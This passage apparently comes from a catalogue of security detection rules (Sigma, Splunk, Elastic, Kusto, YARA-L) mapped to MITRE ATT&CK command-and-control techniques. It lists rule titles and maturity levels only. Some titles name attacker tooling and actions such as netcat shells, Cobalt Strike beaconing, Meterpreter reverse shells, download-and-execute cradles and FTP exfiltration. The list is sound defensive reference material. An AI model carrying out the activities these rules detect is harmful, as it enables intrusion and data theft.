- Splunk Unexpected Network Connection from System Process (Sysmon)
- Splunk Unexpected Network Connection from System Process (Windows Event Log)
- Splunk Unusual HTTP Download (Sysmon)
- Elastic Unusual Network Connection via DllHost production
- Elastic Unusual Network Connection via RunDLL32 production
- Sigma Visual Studio Code Tunnel Execution test
- Splunk Visual Studio Code Tunnel Execution (Sysmon)
- Splunk Visual Studio Code Tunnel Execution (Windows Event Log)
- Sigma Visual Studio Code Tunnel Service Installation test
- Sigma Visual Studio Code Tunnel Shell Execution test
- Splunk Windows AI Platform DNS Query production
- Splunk Windows App Layer Protocol Qakbot NamedPipe production
- Splunk Windows App Layer Protocol Wermgr Connect To NamedPipe production
- Splunk Windows Application Layer Protocol RMS Radmin Tool Namedpipe production
- Splunk Windows ConvertTo-AADIntBackdoor Execution Via PowerShell Script production
- Splunk Windows Credential Target Information Structure in Commandline production
- Splunk Windows DNS Query Request by Telegram Bot API production
- Splunk Windows File Transfer Protocol In Non-Common Process Path production
- Splunk Windows FTP Exfiltration (PowerShell)
- Splunk Windows FTP Exfiltration (Sysmon)
- Splunk Windows FTP Exfiltration (Windows Event Log)
- Kusto Windows host username encoded in base64 web request
- Splunk Windows Kerberos Coercion via DNS production
- Splunk Windows Mail Protocol In Non-Common Process Path production
- Splunk Windows Multi hop Proxy TOR Website Query production
- Splunk Windows Short Lived DNS Record production
- Splunk Windows Visual Basic Commandline Compiler DNSQuery production
Application Layer Protocol: Web Protocols T1071.001 27 rules
- Sigma Change User Agents with WebRequest test
- Sigma Cloudflared Tunnels Related DNS Requests test
- Splunk Command and Control Detection (Windows Event Log)
- Elastic Connection to Commonly Abused Web Services production
- Sigma Curl.EXE Execution With Custom UserAgent test
- Elastic Deprecated - SUNBURST Command and Control Activity production
- Sigma DNS Query Request By QuickAssist.EXE experimental
- Sigma DNS Query To Devtunnels Domain test
- Sigma DNS Query To Visual Studio Code Tunnels Domain test
- Sigma Kalambur Backdoor Curl TOR SOCKS Proxy Execution experimental
- Sigma Outbound Network Connection Initiated By Microsoft Dialer test
- Elastic Outlook Home Page Registry Modification production
- Elastic Potential File Transfer via Certreq production
- Elastic Potential File Transfer via Curl for Windows production
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma Renamed Visual Studio Code Tunnel Execution test
- Elastic Suspicious Execution from a WebDav Share production
- Sigma Tunneling Tool Execution test
- Splunk Unusual HTTP Download (Sysmon)
- Elastic Unusual Network Connection via RunDLL32 production
- Sigma Visual Studio Code Tunnel Execution test
- Splunk Visual Studio Code Tunnel Execution (Sysmon)
- Splunk Visual Studio Code Tunnel Execution (Windows Event Log)
- Sigma Visual Studio Code Tunnel Service Installation test
- Sigma Visual Studio Code Tunnel Shell Execution test
- Splunk Windows ConvertTo-AADIntBackdoor Execution Via PowerShell Script production
- Kusto Windows host username encoded in base64 web request
Application Layer Protocol: File Transfer Protocols T1071.002 6 rules
- Splunk BitsAdmin NetCat PowerCat File Transfer (EDR)
- Splunk BitsAdmin NetCat PowerCat File Transfer (Sysmon)
- Splunk BitsAdmin NetCat PowerCat File Transfer (Windows Event Log)
- Splunk Windows FTP Exfiltration (PowerShell)
- Splunk Windows FTP Exfiltration (Sysmon)
- Splunk Windows FTP Exfiltration (Windows Event Log)
Application Layer Protocol: Mail Protocols T1071.003 3 rules
- Splunk Windows File Transfer Protocol In Non-Common Process Path production
- Splunk Windows Mail Protocol In Non-Common Process Path production
- Splunk Windows Multi hop Proxy TOR Website Query production
Application Layer Protocol: DNS T1071.004 25 rules
- Sigma DNS Exfiltration and Tunneling Tools Execution test
- Splunk DNS Kerberos Coercion production
- Sigma DNS Query by Finger Utility experimental
- Sigma DNS Query To Common Malware Hosting and Shortener Services experimental
- Sigma DNS Query To Katz Stealer Domains experimental
- Sigma DoT (DNS over TLS) activation (command) stable
- Sigma DoT (DNS over TLS) activation (PowerShell) experimental
- Elastic Network Activity to a Suspicious Top Level Domain production
- Sigma Network Connection Initiated via Finger.EXE experimental
- Sigma OilRig APT Activity test
- Sigma OilRig APT Registry Persistence test
- Sigma OilRig APT Schedule Task Persistence - Security test
- Sigma OilRig APT Schedule Task Persistence - System test
- Elastic Potential Command and Control via Internet Explorer production
- Elastic Potential DNS Tunneling via NsLookup production
- Sigma Silence.EDA Detection test
- Sigma Suspicious Cobalt Strike DNS Beaconing - DNS Client test
- Sigma Suspicious Cobalt Strike DNS Beaconing - Sysmon test
- Elastic System Public IP Discovery via DNS Query production
- Splunk Windows AI Platform DNS Query production
- Splunk Windows Credential Target Information Structure in Commandline production
- Splunk Windows DNS Query Request by Telegram Bot API production
- Splunk Windows Kerberos Coercion via DNS production
- Splunk Windows Short Lived DNS Record production
- Splunk Windows Visual Basic Commandline Compiler DNSQuery production
Proxy T1090 39 rules
- Sigma Cloudflared Portable Execution test
- Sigma Cloudflared Quick Tunnel Execution test
- Sigma Cloudflared Tunnel Connections Cleanup test
- Sigma Cloudflared Tunnel Execution test
- Sigma Communication To LocaltoNet Tunneling Service Initiated test
- Sigma Communication To Ngrok Tunneling Service Initiated test
- Elastic Connection to Commonly Abused Web Services production
- Sigma DNS Query Tor .Onion Address - Sysmon test
- Sigma HackTool - Htran/NATBypass Execution test
- Sigma HackTool - SharpChisel Execution test
- Sigma Kalambur Backdoor Curl TOR SOCKS Proxy Execution experimental
- YARA-L MITRE ATT&CK T1090 Port Proxy Forwarding CISA Report
- Sigma Network Communication Initiated To Portmap.IO Domain test
- Sigma New Port Forwarding Rule Added Via Netsh.EXE test
- Sigma New PortProxy Registry Entry Added test
- Splunk Ngrok Reverse Proxy on Network production
- Kusto Ngrok Reverse Proxy on Network (ASIM DNS Solution) available
- Sigma Ngrok Usage with Remote Desktop Service test
- Elastic Port Forwarding Rule Addition production
- Elastic Potential Protocol Tunneling via Cloudflared production
- Elastic Potential Protocol Tunneling via Yuze production
- Sigma Potentially Suspicious Azure Front Door Connection test
- Sigma Potentially Suspicious Usage Of Qemu test
- Sigma PUA - Chisel Tunneling Tool Execution test
- Sigma PUA - Fast Reverse Proxy (FRP) Execution test
- Sigma PUA - NPS Tunneling Tool Execution test
- Sigma PUA- IOX Tunneling Tool Execution test
- Sigma Query Tor Onion Address - DNS Client test
- Sigma RDP over Reverse SSH Tunnel WFP test
- Sigma RDP Port Forwarding Rule Added Via Netsh.EXE test
- Sigma Renamed Cloudflared.EXE Execution test
- Sigma Suspicious TCP Tunnel Via PowerShell Script test
- Sigma Tor Client/Browser Execution test
- Splunk Windows Devtunnels Execution production
- Splunk Windows Devtunnels Image Loaded production
- Splunk Windows Ngrok Reverse Proxy Usage production
- Splunk Windows Proxy Via Netsh production
- Splunk Windows Proxy Via Registry production
- Splunk Windows TOR Client Execution production
Proxy: Internal Proxy T1090.001 9 rules
- Sigma Cloudflared Portable Execution test
- Sigma Cloudflared Quick Tunnel Execution test
- Sigma HackTool - SharpChisel Execution test
- Elastic Port Forwarding Rule Addition production
- Sigma PUA - Chisel Tunneling Tool Execution test
- Sigma RDP over Reverse SSH Tunnel WFP test
- Sigma Renamed Cloudflared.EXE Execution test
- Splunk Windows Proxy Via Netsh production
- Splunk Windows Proxy Via Registry production
Proxy: External Proxy T1090.002 4 rules
- Elastic Connection to Commonly Abused Web Services production
- Sigma Network Communication Initiated To Portmap.IO Domain test
- Elastic Potential Protocol Tunneling via Cloudflared production
- Sigma RDP over Reverse SSH Tunnel WFP test
Proxy: Multi-hop Proxy T1090.003 4 rules
- Sigma DNS Query Tor .Onion Address - Sysmon test
- Sigma Query Tor Onion Address - DNS Client test
- Sigma Tor Client/Browser Execution test
- Splunk Windows TOR Client Execution production
Non-Application Layer Protocol T1095 11 rules
- Splunk Command and Control Detection (Windows Event Log)
- Splunk Meterpreter Reverse Shell (Windows Event Log)
- Sigma Netcat The Powershell Version test
- Elastic Potential Command Shell via NetCat production
- Sigma PUA - Netcat Suspicious Execution test
- Splunk QEMU Network Tunneling - Windows (PowerShell)
- Splunk QEMU Network Tunneling - Windows (Sysmon)
- Splunk QEMU Network Tunneling - Windows (Windows Event Log)
- Splunk Tunneling Process Created (PowerShell)
- Splunk Tunneling Process Created (Sysmon)
- Splunk Tunneling Process Created (Windows Event Log)
Web Service T1102 21 rules
- Sigma Cloudflared Tunnel Connections Cleanup test
- Sigma Cloudflared Tunnel Execution test
- Sigma Communication To LocaltoNet Tunneling Service Initiated test
- Sigma Communication To Ngrok Tunneling Service Initiated test
- Elastic Connection to Commonly Abused Web Services production
- Sigma Github Self-Hosted Runner Execution test
- Sigma Network Connection Initiated To AzureWebsites.NET By Non-Browser Process test
- Sigma New Connection Initiated To Potential Dead Drop Resolver Domain test
- Splunk Ngrok Reverse Proxy on Network production
- Kusto Ngrok Reverse Proxy on Network (ASIM DNS Solution) available
- Splunk Potential Telegram API Request Via CommandLine production
- Sigma Potentially Suspicious Azure Front Door Connection test
- Sigma Potentially Suspicious Network Connection To Notion API test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma Process Initiated Network Connection To Ngrok Domain test
- Sigma Suspicious Child Process Of Manage Engine ServiceDesk test
- Sigma Suspicious Non-Browser Network Communication With Google API experimental
- Sigma Suspicious Non-Browser Network Communication With Telegram API test
- Splunk Windows Abused Web Services production
- Splunk Windows DNS Query Request by Telegram Bot API production
- Splunk Windows Ngrok Reverse Proxy Usage production
Web Service: Bidirectional Communication T1102.002 6 rules
- Elastic Connection to Commonly Abused Web Services production
- Sigma Github Self-Hosted Runner Execution test
- Splunk Potential Telegram API Request Via CommandLine production
- Sigma Potentially Suspicious Azure Front Door Connection test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Splunk Windows DNS Query Request by Telegram Bot API production
Ingress Tool Transfer T1105 191 rules
- Sigma AppX Package Installation Attempts Via AppInstaller.EXE test
- Sigma Arbitrary File Download Via GfxDownloadWrapper.EXE test
- Sigma Axios NPM Compromise File Creation Indicators - Linux experimental
- Sigma Axios NPM Compromise File Creation Indicators - MacOS experimental
- Sigma Axios NPM Compromise Indicators - Linux experimental
- Sigma Axios NPM Compromise Indicators - macOS experimental
- Sigma Axios NPM Compromise Indicators - Windows experimental
- Sigma BITS payload downloaded via commandline experimental
- Sigma BITS payload downloaded via PowerShell experimental
- Elastic Bitsadmin Activity production
- Kusto Bitsadmin Activity available
- Splunk BITSAdmin Download File production
- Splunk BITSadmin Execution (PowerShell)
- Splunk BITSadmin Execution (Sysmon)
- Splunk BITSadmin Execution (Windows Event Log)
- Sigma Browser Execution In Headless Mode test
- Kusto C2-NamedPipe available
- Splunk Certutil Execution (Sysmon)
- Splunk Certutil Execution (Windows Event Log)
- Splunk Certutil File Download (PowerShell)
- Splunk Certutil File Download (Sysmon)
- Splunk Certutil File Download (Windows Event Log)
- Sigma Certutil payload download (command) experimental
- Sigma Command Line Execution with Suspicious URL and AppData Strings test
- Sigma Curl Download And Execute Combination test
- Splunk Curl Execution with Percent Encoded URL production
- Sigma Curl.EXE Execution test
- Sigma DarkGate - Autoit3.EXE File Creation By Uncommon Process test
- Splunk Detect Certify Command Line Arguments production
- Splunk Download Files Using Telegram production
- Splunk Esentutl Execution (PowerShell)
- Splunk Esentutl Execution (Sysmon)
- Splunk Esentutl Execution (Windows Event Log)
- Splunk Executable File Written to Disk (Sysmon)
- Splunk Executable File Written to Disk (Windows Event Log)
- Splunk Expand.exe Execution (PowerShell)
- Splunk Expand.exe Execution (Sysmon)
- Splunk Expand.exe Execution (Windows Event Log)
- Sigma File Download And Execution Via IEExec.EXE test
- Sigma File Download From Browser Process Via Inline URL test
- Sigma File Download From IP Based URL Via CertOC.EXE test
- Splunk File Download or Read to Pipe Execution production
- Sigma File Download Using Notepad++ GUP Utility test
- YARA-L File Download Using Notepad++ GUP Utility
- Sigma File Download Via Bitsadmin test
- Sigma File Download Via Bitsadmin To A Suspicious Target Folder test
- Sigma File Download via CertOC.EXE test
- Sigma File Download Via Curl.EXE test
- Sigma File Download Via Windows Defender MpCmpRun.EXE test
- YARA-L File Download Via Windows Defender MpCmpRun.EXE
- Sigma File Download with Headless Browser test
- Splunk File Executed from INetCache (Sysmon)
- Splunk File Executed from INetCache (Windows Event Log)
- Sigma File With Suspicious Extension Downloaded Via Bitsadmin test
- Splunk Finger Execution (Sysmon)
- Splunk Finger Execution (Windows Event Log)
- Sigma Finger.EXE Execution test
- YARA-L Finger.EXE Execution
- Splunk Git Clone Repository (PowerShell)
- Splunk Git Submodule Cloned - Windows (Sysmon)
- Splunk Git Submodule Cloned - Windows (Windows Event Log)
- Sigma Greenbug Espionage Group Indicators test
- Sigma Import LDAP Data Interchange Format File Via Ldifde.EXE test
- Kusto Ingress Tool Transfer - Certutil available
- Sigma Insensitive Subfolder Search Via Findstr.EXE test
- Splunk Invoke-WebRequest Command (PowerShell)
- Splunk Invoke-WebRequest Command (Sysmon)
- Splunk Invoke-WebRequest Command (Windows Event Log)
- Sigma Legitimate Application Writing Files In Uncommon Location experimental
- Splunk Live Sysinternals Execution (Sysmon)
- Splunk Live Sysinternals Execution (Windows Event Log)
- Sigma Local Network Connection Initiated By Script Interpreter test
- Sigma Lolbas OneDriveStandaloneUpdater.exe Proxy Download test
- Splunk LOLBAS With Network Traffic production
- Splunk mshta.exe File Download (PowerShell)
- Splunk mshta.exe File Download (Sysmon)
- Splunk mshta.exe File Download (Windows Event Log)
- Sigma MsiExec Web Install test
- Sigma Network Communication Initiated To File Sharing Domains From Process Located In Suspicious Folder test
- Sigma Network Connection Initiated By IMEWDBLD.EXE test
- Sigma Network Connection Initiated From Process Located In Potentially Suspicious Or Uncommon Location test
- Sigma Network Connection Initiated From Users\Public Folder test
- Elastic Network Connection via Certutil production
- Elastic Network Connection via MsXsl production
- Splunk Network Connection with Suspicious Folder (Sysmon)
- Splunk Network Connection with Suspicious Folder (Windows Event Log)
- Splunk ngen.exe File Download (PowerShell)
- Splunk ngen.exe File Download (Sysmon)
- Splunk ngen.exe File Download (Windows Event Log)
- Kusto Office Apps Launching Wscipt available
- Splunk Office Binary Download Remote File (Windows Event Log)
- Sigma Outbound Network Connection Initiated By Script Interpreter test
- Splunk Package installation (PowerShell)
- Splunk Package installation (Sysmon)
- Splunk Package installation (Windows Event Log)
- Sigma Pandemic Registry Key test
- Sigma Password Protected ZIP File Opened (Suspicious Filenames) test
- Sigma Payload downloaded via PowerShell
- Sigma Potential COM Objects Download Cradles Usage - Process Creation test
- Sigma Potential COM Objects Download Cradles Usage - PS Script test
- Sigma Potential Data Exfiltration Via Curl.EXE test
- Sigma Potential DLL File Download Via PowerShell Invoke-WebRequest test
- Sigma Potential Download/Upload Activity Using Type Command test
- Sigma Potential Exploitation of RCE Vulnerability CVE-2025-33053 experimental
- Sigma Potential Exploitation of RCE Vulnerability CVE-2025-33053 - Image Load experimental
- Sigma Potential Exploitation of RCE Vulnerability CVE-2025-33053 - Process Access experimental
- Elastic Potential File Download via a Headless Browser production
- Elastic Potential File Transfer via Certreq production
- Elastic Potential File Transfer via Curl for Windows production
- Sigma Potential Pikabot Infection - Suspicious Command Combinations Via Cmd.EXE test
- Elastic Potential Remote File Execution via MSIEXEC production
- Elastic Potential Remote Install via MsiExec production
- Sigma Potentially Suspicious File Creation by OpenEDR's ITSMService experimental
- Splunk PowerShell Download Activity (PowerShell)
- Sigma PowerShell Download Via Net.WebClient - PowerShell Classic test
- Splunk PowerShell DownloadFile_DownloadString (PowerShell)
- Splunk PowerShell DownloadFile_DownloadString (Sysmon)
- Splunk PowerShell DownloadFile_DownloadString (Windows Event Log)
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma PowerShell MSI Install via WindowsInstaller COM From Remote Location experimental
- Splunk PowerShell Script Block With URL Chain production
- Splunk PowerShell WebRequest Using Memory Stream production
- Sigma PrintBrm ZIP Creation of Extraction test
- YARA-L PrintBrm ZIP Creation of Extraction
- Sigma Process Execution From WebDAV Share experimental
- Splunk ProtocolHandler.exe File Download (PowerShell)
- Splunk ProtocolHandler.exe File Download (Sysmon)
- Splunk ProtocolHandler.exe File Download (Windows Event Log)
- Sigma PUA - Nimgrab Execution test
- YARA-L PUA - Nimgrab Execution
- Sigma Remote Access Tool - TacticalRMM Agent Registration to Potentially Attacker-Controlled Server experimental
- Elastic Remote File Copy via TeamViewer production
- Sigma Remote File Download Via Desktopimgdownldr Utility test
- Elastic Remote File Download via Desktopimgdownldr Utility production
- Sigma Remote File Download Via Findstr.EXE test
- Elastic Remote File Download via MpCmdRun production
- Elastic Remote File Download via PowerShell production
- Elastic Remote File Download via Script Interpreter production
- Sigma Replace.exe Usage test
- Sigma Scheduled Task Creation with Curl and PowerShell Execution Combo experimental
- Sigma Suspicious CertReq Command to Download experimental
- YARA-L Suspicious Certreq Command to Download
- Elastic Suspicious CertUtil Commands production
- Elastic Suspicious Command Prompt Network Connection production
- Splunk Suspicious Curl Network Connection experimental
- Sigma Suspicious Curl.EXE Download test
- YARA-L Suspicious Curl.EXE Download
- Sigma Suspicious Deno File Written from Remote Source experimental
- Sigma Suspicious Desktopimgdownldr Command test
- Sigma Suspicious Desktopimgdownldr Target File test
- Sigma Suspicious Diantz Download and Compress Into a CAB File test
- Sigma Suspicious Download From File-Sharing Website Via Bitsadmin test
- Sigma Suspicious Download from Office Domain test
- Sigma Suspicious Download Via Certutil.EXE test
- Sigma Suspicious Dropbox API Usage test
- Elastic Suspicious Execution from a WebDav Share production
- Elastic Suspicious Execution from INET Cache production
- Elastic Suspicious Execution from VS Code Extension production
- Sigma Suspicious Extrac32 Execution test
- Sigma Suspicious File Created by ArcSOC.exe experimental
- Sigma Suspicious File Downloaded From Direct IP Via Certutil.EXE test
- Sigma Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE test
- Splunk Suspicious File written to Disk (Windows Event Log)
- Sigma Suspicious Invoke-WebRequest Execution test
- YARA-L Suspicious Invoke-WebRequest Execution
- Sigma Suspicious Invoke-WebRequest Execution With DirectIP test
- Elastic Suspicious JavaScript Execution via Deno production
- Sigma Suspicious Non-Browser Network Communication With Telegram API test
- Elastic Suspicious ScreenConnect Client Child Process production
- Elastic Suspicious Windows Command Shell Arguments production
- Elastic Suspicious Windows Powershell Arguments production
- Splunk Temporary File Executed from Public Folder (Sysmon)
- Splunk Temporary File Executed from Public Folder (Windows Event Log)
- Sigma Uncommon Network Connection Initiated By Certutil.EXE test
- Splunk Unusual HTTP Download (Sysmon)
- Splunk Visio.exe File Download (PowerShell)
- Splunk Visio.exe File Download (Sysmon)
- Splunk Visio.exe File Download (Windows Event Log)
- Splunk Windows Cabinet File Extraction Via Expand production
- Splunk Windows Curl Download to Suspicious Path production
- Splunk Windows Curl Upload to Remote Destination production
- Splunk Windows DLL Module Loaded in Temp Dir production
- Splunk Windows DNS Query Request To TinyUrl production
- Splunk Windows File Download Via CertUtil production
- Splunk Windows File Download Via PowerShell production
- Splunk Windows Ingress Tool Transfer Using Explorer production
- Splunk Windows Ldifde Directory Object Behavior production
- Splunk Windows Process Execution From RDP Share production
- Splunk Windows SQL Spawning CertUtil experimental
- Splunk Windows SSH Proxy Command production
- Splunk WinRAR Spawning Shell Application production
Data Encoding T1132 11 rules
- Splunk Certutil Execution (Sysmon)
- Splunk Certutil Execution (Windows Event Log)
- Splunk Certutil Obfuscate_Encode Files (EDR)
- Splunk Certutil Obfuscate_Encode Files (PowerShell)
- Splunk Certutil Obfuscate_Encode Files (Sysmon)
- Splunk Certutil Obfuscate_Encode Files (Windows Event Log)
- Sigma DNS Exfiltration and Tunneling Tools Execution test
- Elastic File Compressed or Archived into Common Format by Unsigned Process production
- Sigma Gzip Archive Decode Via PowerShell test
- Sigma Suspicious FromBase64String Usage On Gzip Archive - Process Creation test
- Sigma Suspicious FromBase64String Usage On Gzip Archive - Ps Script test
Data Encoding: Standard Encoding T1132.001 5 rules
- Sigma DNS Exfiltration and Tunneling Tools Execution test
- Elastic File Compressed or Archived into Common Format by Unsigned Process production
- Sigma Gzip Archive Decode Via PowerShell test
- Sigma Suspicious FromBase64String Usage On Gzip Archive - Process Creation test
- Sigma Suspicious FromBase64String Usage On Gzip Archive - Ps Script test
Remote Access Tools T1219 84 rules
- Splunk AnyDesk Command Line Execution (Sysmon)
- Splunk AnyDesk Command Line Execution (Windows Event Log)
- Splunk AnyDesk Execution from Suspicious Folder (Sysmon)
- Splunk AnyDesk Execution from Suspicious Folder (Windows Event Log)
- Splunk AnyDesk Silent Install (Sysmon)
- Splunk AnyDesk Silent Install (Windows Event Log)
- Sigma Anydesk Temporary Artefact test
- Sigma Atera Agent Installation test
- Splunk AteraAgent Installation - Windows (Sysmon)
- Splunk AteraAgent Installation - Windows (Windows Event Log)
- Elastic Attempt to Establish VScode Remote Tunnel production
- Splunk Detect Remote Access Software Usage DNS production
- Splunk Detect Remote Access Software Usage File production
- Splunk Detect Remote Access Software Usage FileInfo production
- Splunk Detect Remote Access Software Usage Process production
- Splunk Detect Remote Access Software Usage Registry production
- Sigma DNS Query To AzureWebsites.NET By Non-Browser Process test
- Sigma DNS Query To Remote Access Software Domain From Non-Browser App test
- Elastic First Time Seen DNS Query to RMM Domain production
- Elastic First Time Seen Remote Monitoring and Management Tool production
- Sigma GoToAssist Temporary Installation Artefact test
- Sigma HackTool - Inveigh Execution Artefacts test
- Sigma HackTool - RemoteKrbRelay SMB Relay Secrets Dump Module Indicators test
- Sigma Hijack Legit RDP Session to Move Laterally test
- Sigma Installation of TeamViewer Desktop test
- Sigma Mesh Agent Service Installation test
- Sigma Mstsc.EXE Execution With Local RDP File test
- Elastic Multiple Remote Management Tool Vendors on Same Host production
- Elastic NetSupport Manager Execution from an Unusual Path production
- Sigma OpenEDR Spawning Command Shell experimental
- Sigma Potential Amazon SSM Agent Hijacking test
- Sigma Potential CSharp Streamer RAT Loading .NET Executable Image test
- Elastic Potential REMCOS Trojan Execution production
- Sigma Potential Remote Desktop Connection to Non-Domain Host test
- Sigma Potential SocGholish Second Stage C2 DNS Query test
- Sigma Potentially Suspicious File Creation by OpenEDR's ITSMService experimental
- Sigma QuickAssist Execution experimental
- Splunk Remote Access Software Execution (Sysmon)
- Splunk Remote Access Software Execution (Windows Event Log)
- Sigma Remote Access Tool - Action1 Arbitrary Code Execution and Remote Sessions test
- Sigma Remote Access Tool - AnyDesk Execution test
- Sigma Remote Access Tool - Anydesk Execution From Suspicious Folder test
- Sigma Remote Access Tool - AnyDesk Incoming Connection experimental
- Sigma Remote Access Tool - AnyDesk Piped Password Via CLI test
- Sigma Remote Access Tool - AnyDesk Silent Installation test
- Sigma Remote Access Tool - GoToAssist Execution test
- Sigma Remote Access Tool - LogMeIn Execution test
- Sigma Remote Access Tool - MeshAgent Command Execution via MeshCentral test
- Sigma Remote Access Tool - NetSupport Execution test
- Sigma Remote Access Tool - Potential MeshAgent Execution - Windows experimental
- Sigma Remote Access Tool - Renamed MeshAgent Execution - Windows experimental
- Sigma Remote Access Tool - ScreenConnect Execution test
- Sigma Remote Access Tool - ScreenConnect Potential Suspicious Remote Command Execution test
- Sigma Remote Access Tool - Simple Help Execution test
- Sigma Remote Access Tool - TacticalRMM Agent Registration to Potentially Attacker-Controlled Server experimental
- Sigma Remote Access Tool - UltraViewer Execution test
- Elastic Remote File Copy via TeamViewer production
- Elastic Remote Management Access Launch After MSI Install production
- Sigma Renamed Visual Studio Code Tunnel Execution test
- Sigma ScreenConnect Temporary Installation Artefact test
- Splunk SimpleHelp Remote Access Tool Execution (Sysmon)
- Splunk SimpleHelp Remote Access Tool Execution (Windows Event Log)
- Splunk SimpleHelp Remote Access Tool Service Installation (Windows Event Log)
- Splunk Suspicious AteraAgent Installation - Windows (PowerShell)
- Splunk Suspicious AteraAgent Installation - Windows (Sysmon)
- Splunk Suspicious AteraAgent Installation - Windows (Windows Event Log)
- Sigma Suspicious Binary Writes Via AnyDesk test
- Sigma Suspicious Mstsc.EXE Execution With Local RDP File test
- Elastic Suspicious ScreenConnect Client Child Process production
- Elastic Suspicious Shell Execution via Velociraptor production
- Sigma Suspicious TSCON Start as SYSTEM test
- Sigma Suspicious Velociraptor Child Process experimental
- Sigma TacticalRMM Service Installation test
- Sigma TeamViewer Domain Query By Non-TeamViewer Application test
- Sigma TeamViewer Remote Session test
- Splunk Temporary ConnectWise xml File Activity (Windows Event Log)
- YARA-L Uncommon or Suspicious RMM Tool Execution Detected
- Sigma Use of UltraVNC Remote Access Software test
- Sigma Visual Studio Code Tunnel Execution test
- Splunk Windows Level RMM PowerShell Script Installer production
- Splunk Windows Level RMM Watchdog Task Created production
- Splunk Windows Remote Access Software BRC4 Loaded Dll production
- Splunk Windows Remote Access Software RMS Registry production
- Splunk Windows RMM Tool Execution production
Remote Access Tools: Remote Desktop Software T1219.002 45 rules
- Sigma Anydesk Temporary Artefact test
- Sigma Atera Agent Installation test
- Sigma DNS Query To AzureWebsites.NET By Non-Browser Process test
- Sigma DNS Query To Remote Access Software Domain From Non-Browser App test
- Elastic First Time Seen DNS Query to RMM Domain production
- Elastic First Time Seen Remote Monitoring and Management Tool production
- Sigma GoToAssist Temporary Installation Artefact test
- Sigma HackTool - Inveigh Execution Artefacts test
- Sigma HackTool - RemoteKrbRelay SMB Relay Secrets Dump Module Indicators test
- Sigma Hijack Legit RDP Session to Move Laterally test
- Sigma Installation of TeamViewer Desktop test
- Sigma Mesh Agent Service Installation test
- Sigma Mstsc.EXE Execution With Local RDP File test
- Elastic Multiple Remote Management Tool Vendors on Same Host production
- Sigma Potential Amazon SSM Agent Hijacking test
- Sigma Potential CSharp Streamer RAT Loading .NET Executable Image test
- Sigma Potential Remote Desktop Connection to Non-Domain Host test
- Sigma Potential SocGholish Second Stage C2 DNS Query test
- Sigma QuickAssist Execution experimental
- Sigma Remote Access Tool - Action1 Arbitrary Code Execution and Remote Sessions test
- Sigma Remote Access Tool - AnyDesk Execution test
- Sigma Remote Access Tool - Anydesk Execution From Suspicious Folder test
- Sigma Remote Access Tool - AnyDesk Incoming Connection experimental
- Sigma Remote Access Tool - AnyDesk Piped Password Via CLI test
- Sigma Remote Access Tool - AnyDesk Silent Installation test
- Sigma Remote Access Tool - GoToAssist Execution test
- Sigma Remote Access Tool - LogMeIn Execution test
- Sigma Remote Access Tool - MeshAgent Command Execution via MeshCentral test
- Sigma Remote Access Tool - NetSupport Execution test
- Sigma Remote Access Tool - Potential MeshAgent Execution - Windows experimental
- Sigma Remote Access Tool - Renamed MeshAgent Execution - Windows experimental
- Sigma Remote Access Tool - ScreenConnect Execution test
- Sigma Remote Access Tool - ScreenConnect Potential Suspicious Remote Command Execution test
- Sigma Remote Access Tool - Simple Help Execution test
- Sigma Remote Access Tool - UltraViewer Execution test
- Elastic Remote Management Access Launch After MSI Install production
- Sigma ScreenConnect Temporary Installation Artefact test
- Sigma Suspicious Binary Writes Via AnyDesk test
- Sigma Suspicious Mstsc.EXE Execution With Local RDP File test
- Elastic Suspicious Shell Execution via Velociraptor production
- Sigma Suspicious TSCON Start as SYSTEM test
- Sigma TacticalRMM Service Installation test
- Sigma TeamViewer Domain Query By Non-TeamViewer Application test
- Sigma TeamViewer Remote Session test
- Sigma Use of UltraVNC Remote Access Software test
Dynamic Resolution T1568 8 rules
- Sigma Communication To Ngrok Tunneling Service Initiated test
- Elastic Connection to Commonly Abused Web Services production
- Kusto Detect DNS queries reporting multiple errors from different clients - Static threshold based (ASIM DNS Solution) available
- Kusto Detect excessive NXDOMAIN DNS queries - Static threshold based (ASIM DNS Solution) available
- Kusto Excessive NXDOMAIN DNS Queries (ASIM DNS Schema)
- Kusto Potential DGA(Domain Generation Algorithm) detected via Repetitive Failures - Static threshold based (ASIM DNS Solution) available
- Kusto RecordedFuture Threat Hunting Domain All Actors
- Kusto RecordedFuture Threat Hunting IP All Actors
Dynamic Resolution: Domain Generation Algorithms T1568.002 2 rules
- Sigma Communication To Ngrok Tunneling Service Initiated test
- Elastic Connection to Commonly Abused Web Services production
Non-Standard Port T1571 4 rules
- Sigma Communication To Uncommon Destination Ports test
- Kusto Potential beaconing activity (ASIM Network Session schema) available
- Sigma Potentially Suspicious Malware Callback Communication test
- Sigma Testing Usage of Uncommonly Used Port test
Protocol Tunneling T1572 54 rules
- Sigma Cloudflared Tunnel Connections Cleanup test
- Sigma Cloudflared Tunnel Execution test
- Sigma Cloudflared Tunnels Related DNS Requests test
- Sigma Communication To LocaltoNet Tunneling Service Initiated test
- Sigma Communication To Ngrok Tunneling Service Initiated test
- Sigma DNS Query To Devtunnels Domain test
- Splunk Named Pipe Created (Sysmon)
- Sigma Network Connection Initiated To BTunnels Domains test
- Sigma Network Connection Initiated To Cloudflared Tunnels Domains test
- Sigma Network Connection Initiated To DevTunnels Domain test
- Sigma Network Connection Initiated To Visual Studio Code Tunnels Domain test
- Splunk ngrok Execution - Windows (PowerShell)
- Splunk ngrok Execution - Windows (Sysmon)
- Splunk ngrok Execution - Windows (Windows Event Log)
- Splunk Ngrok Reverse Proxy on Network production
- Kusto Ngrok Reverse Proxy on Network (ASIM DNS Solution) available
- Sigma Port Forwarding Activity Via SSH.EXE test
- Elastic Port Forwarding Rule Addition production
- Elastic Potential DNS Tunneling via NsLookup production
- Splunk Potential ngrok Tunnel - Windows (Windows Event Log)
- Elastic Potential Protocol Tunneling via Cloudflared production
- Elastic Potential Protocol Tunneling via Yuze production
- Sigma Potential RDP Tunneling Via Plink test
- Sigma Potential RDP Tunneling Via SSH test
- Kusto Potential Remote Desktop Tunneling available
- Elastic Potential Remote Desktop Tunneling Detected production
- Sigma Potentially Suspicious Usage Of Qemu test
- Sigma Process Initiated Network Connection To Ngrok Domain test
- Sigma PUA - 3Proxy Execution test
- Sigma PUA - Ngrok Execution test
- Splunk QEMU Network Tunneling - Windows (PowerShell)
- Splunk QEMU Network Tunneling - Windows (Sysmon)
